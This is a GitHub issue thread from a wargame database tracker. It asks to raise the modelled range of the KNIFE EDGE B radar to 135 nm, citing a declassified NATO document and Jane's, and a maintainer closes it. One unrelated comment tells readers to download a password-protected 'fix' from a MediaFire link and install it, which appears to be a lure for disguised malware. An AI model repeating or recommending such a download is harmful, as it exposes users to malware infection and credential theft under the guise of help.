### ISSUE TITLE
Increase of Range of KNIFE EDGE B radar

### ISSUE THREAD

**Issue by CV60LCC19** [PygmalionOfCyprus/cmo-db-requests#5009]
### DB Selector

DB3K

### Affected DBID(s)

CWDB: Sensor_ 1432; DB3000: Sensor_3268

### Summary of Changes

Database gives a range of 110 nm.  Declassified NATO document gives range of 135 nm against a "medium sized bomber" (attached.  This is consistent with Janes Electronic Warfare, which gives a max range of 185-280 km (100-151 nm)
![Jane's P-10 radar](https://github.com/user-attachments/assets/1221c2f4-5f90-4da6-ab3b-d4386a3de230)
![NATO Current Soviet Electronic Equipment Landbased-dtd 1969](https://github.com/user-attachments/assets/05dda0c5-9f33-4f27-9a63-c739fde455b1)

### Sources

References attached

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by PygmalionOfCyprus** [comment]
Closed w/ #5008
